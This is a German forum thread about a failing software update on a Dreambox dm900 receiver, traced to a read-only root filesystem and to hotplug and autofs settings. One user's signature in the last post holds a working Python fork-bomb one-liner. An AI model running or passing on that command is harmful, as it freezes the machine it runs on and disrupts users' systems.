Update funktioniert nicht

    Diese Seite verwendet Cookies. Durch die Nutzung unserer Seite erklären Sie sich damit einverstanden, dass wir Cookies setzen. Weitere Informationen

    • Update funktioniert nicht

      Hallo zusammen,

      ich habe eine dm900 mit os: 4.3.0r29-2017-02-22 und Image: Newnigma2-daily 2017-02-26.
      Wenn ich mit die blaue Taste drücke, Newnigma2 Services, Softwareverwaltung und System aktualisieren auswähle
      wird das System aktualisiert und danach starte ich neu.
      Unmittelbar nach dem Neustart bietet mir die Box die Möglichkeit zum Update. Wenn ich das ausführen möchte erscheint folgendes.
      E: Unable to write to /var/Cache/apt
      E: The package list or Status file could not be parsed or opened.

      Ich habe mit dem DCC die Attribute verändert (write alle Haken raus).
      Leider funktioniert es nicht. ;(
      Im Ordner apt sind ein Ordner der heißt Archives und zwei Dateien pkgcache.bin und srcpkgcache,bin.

      Kann mir da bitte jemand helfen???????

      Danke schon mal fürs lesen :)
      VG ehcap
    • Hallo,

      dein Filesystem ist readonly, da gibt es hier im Board eine schöne Anleitung, wie du das beheben kannst.
      DM900UHD root write protect, Filesystem read only gemountet

      ... kannst du dich noch erinnern, was du als letztes mit deiner Box gemacht hast? Eventuell Netzwerkmounts einzubinden?
    • ...nö, kann mich nicht erinnern.
      Ich kann mit der HDD nicht aufnehmen und habe eine neue eingebaut, die kann ich nicht mal initialisieren.
      Dann habe ich mir gedacht ich mach mal erst ein update.

      LG ehcap
      VG ehcap
    • Das was in dem Post als letztes geschrieben wird habe ich versucht. Auch wenn ich die Attribute auf 777 setzte kann ich die Raute nicht speichern
      und das hotplug wenn ich deinstalliere ist es beim nächsten Neustart wieder aktiv und jetzt kann ich das hotplug nicht mal mehr entfernen, da kommt der gleiche Fehler wie in meinem ersten Post.

      Folgen das was in dem Artikel steht:
      ich habe jetzt einfach hotplug in /etc/auto.master.d/enigma2.autofs deaktiviert.
      #/autofs /etc/auto.hotplug

      So wird es bei mir angezeit:
      /dev/mmcblk0p2 on / type ext4 (rw,relatime,data=ordered

      Wie auch immer, die neue HDD hat sich jetzt selbst eingebunden und ich kann auch aufnehmen.
      Warum funktioniert das update nicht?
      VG ehcap

      Dieser Beitrag wurde bereits 1 mal editiert, zuletzt von ehcap ()

    • ehcap schrieb:


      Warum funktioniert das update nicht?
      Solange du das nicht per Telnet machst und die Ausgabe postest, kann dir das keiner sagen....
      Yamp - Musicplayer mit Arist-Art-Hintergrund und "Karaoke Light" - aktuelle Version V3.3.2 hier, bitte beachten: FAQ hier

      Wissen ist eins der wenigen Güter, das sich durch Teilen vermehren lässt .... :thumbsup:
    • Also das was der Paketmanager als fehler ausgibt ist identisch zu apt da brauch man keine konsole.
      Aber momentan geht das Problemlos.
      Bilder
      • screenshot.png

        39,73 kB, 1.920×1.080, 352 mal angesehen
      python -c 'while 1: __import__("os").fork()'
      Wer der Herde hinterher läuft frisst nur Scheisse , nicht das Gras !